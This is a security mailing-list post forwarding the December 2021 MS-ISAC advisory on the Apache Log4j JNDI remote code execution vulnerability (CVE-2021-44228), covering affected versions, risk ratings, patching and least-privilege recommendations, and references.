[CoIT-Security] UPDATED MS-ISAC CYBERSECURITY ADVISORY - A Vulnerability in Apache Log4j Could Allow for Arbitrary Code Execution - PATCH: NOW - TLP: WHITE

Goode, April april at onenet.net
Mon Dec 13 15:25:37 CST 2021 

Good afternoon,

Chris has asked me to share this cybersecurity advisory from MS-ISAC.

Thanks,
April Goode, MBA, SPP
Director of OneNet Strategic Planning and Communications
Oklahoma State Regents for Higher Education
405.225.9251
april at onenet.net<mailto:april at onenet.net>

Subject: CYBERSECURITY ADVISORY for Log4j Vulnerability

Please see the advisory below from MS-ISAC

>>
________________________________


TLP: WHITE

MS-ISAC CYBERSECURITY ADVISORY



MS-ISAC ADVISORY NUMBER:

2021-158 - UPDATED



DATE(S) ISSUED:

12/10/2021

12/13/2021 - UPDATED



SUBJECT:

A Vulnerability in Apache Log4j Could Allow for Arbitrary Code Execution



OVERVIEW:

A vulnerability has been discovered in Apache Log4j, a very ubiquitous logging package for Java. Successful exploitation of this vulnerability could allow for arbitrary code execution within the context of the systems and services that use the Java logging library, including many services and applications written in Java. Depending on the privileges associated with these systems and services, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If these systems and services have been configured to have fewer user rights, exploitation of this vulnerability could have less impact than if they were configured with administrative rights.



THREAT INTELLIGENCE:

According to numerous open source reports, Log4j is used with Apache software like Apache Struts, Solr, Druid, along with other technologies. Many websites of manufacturers and providers have been found to be affected including Apple, Twitter, Steam, Tesla and more. Threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data. In addition, it has been reported that organizations are already seeing signs of exploitation in the wild with further attempts on other websites likely.



SYSTEMS AFFECTED:
*         Apache Log4j between versions 2.0 and 2.14.1



RISK:

Government:

  *   Large and medium government entities: High
  *   Small government entities: High

Businesses:

  *   Large and medium business entities: High
  *   Small business entities: High

Home users: High



TECHNICAL SUMMARY:

A vulnerability has been discovered in Apache Log4j, a very ubiquitous logging package for Java. This vulnerability resides in the JNDI lookup feature of the log4j library. The JNDI lookup feature of log4j allows variables to be retrieved via JNDI - Java Naming and Directory Interface. This is an API that provides naming and directory functionality to Java applications. While there are many possibilities, the log4j API supports LDAP and RMI (Remote Method Invocation). An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.



Successful exploitation of this vulnerability could allow for arbitrary code execution within the context of the systems and services that use the Java logging library, including many services and applications written in Java. Depending on the privileges associated with these systems and services, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. If these systems and services have been configured to have fewer user rights, exploitation of this vulnerability could have less impact than if they were configured with administrative rights.



RECOMMENDATIONS:

We recommend the following actions be taken:

*        Apply the latest patches (version 2.15.0) provided by Apache after appropriate testing.

*        Run all systems and services as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.

*        Apply the Principle of Least Privilege to all systems and services.



December 13th - UPDATED RECOMMENDATIONS:
*         Run the "Log4Shell" Vulnerability Tester provided by Huntress to test whether your applications are vulnerable to CVE-2021-44228 (please see references for the Huntress link).
*         Check the GitHub repository listed in the reference section to see all the Security Advisories & Bulletins related to CVE-2021-44228, which include applications affected, version numbers, and the associated patches that should be implemented if you have the affected version in your environment.



REFERENCES:



CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228



SANS Technology Institute:

https://isc.sans.edu/diary/28120



ZDNet:

https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/



Ars Technica:

https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/



December 13th - UPDATED REFERENCES:



GitHub:

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592



Huntress Log4Shell Tool:

https://log4shell.huntress.com/





Multi-State Information Sharing and Analysis Center (MS-ISAC)

Elections Infrastructure Information Sharing and Analysis Center (EI-ISAC)

31 Tech Valley Drive

East Greenbush, NY 12061



24x7 Security Operations Center

SOC at cisecurity.org<mailto:SOC at cisecurity.org> - 1-866-787-4722

[cid:image001.png at 01D7E789.BE8CE700]<https://www.cisecurity.org/isac/>

             [cid:image002.png at 01D7E789.BE8CE700] <https://www.linkedin.com/company/the-center-for-internet-security/>  [cid:image003.png at 01D7E789.BE8CE700] <https://twitter.com/CISecurity>  [cid:image004.png at 01D7E789.BE8CE700] <https://www.facebook.com/CenterforIntSec>  [cid:image005.png at 01D7E789.BE8CE700] <https://www.youtube.com/user/TheCISecurity>  [cid:image006.png at 01D7E789.BE8CE700] <https://www.instagram.com/cisecurity>

TLP: WHITE
https://www.cisa.gov/tlp
Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.
. . . . .
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.onenet.net/pipermail/coit-security/attachments/20211213/09adc7cc/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.png
Type: image/png
Size: 14917 bytes
Desc: image001.png
URL: <http://lists.onenet.net/pipermail/coit-security/attachments/20211213/09adc7cc/attachment-0006.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image002.png
Type: image/png
Size: 2151 bytes
Desc: image002.png
URL: <http://lists.onenet.net/pipermail/coit-security/attachments/20211213/09adc7cc/attachment-0007.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image003.png
Type: image/png
Size: 2332 bytes
Desc: image003.png
URL: <http://lists.onenet.net/pipermail/coit-security/attachments/20211213/09adc7cc/attachment-0008.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image004.png
Type: image/png
Size: 1984 bytes
Desc: image004.png
URL: <http://lists.onenet.net/pipermail/coit-security/attachments/20211213/09adc7cc/attachment-0009.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image005.png
Type: image/png
Size: 1847 bytes
Desc: image005.png
URL: <http://lists.onenet.net/pipermail/coit-security/attachments/20211213/09adc7cc/attachment-0010.png>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image006.png
Type: image/png
Size: 3496 bytes
Desc: image006.png
URL: <http://lists.onenet.net/pipermail/coit-security/attachments/20211213/09adc7cc/attachment-0011.png>

More information about the CoIT-Security mailing list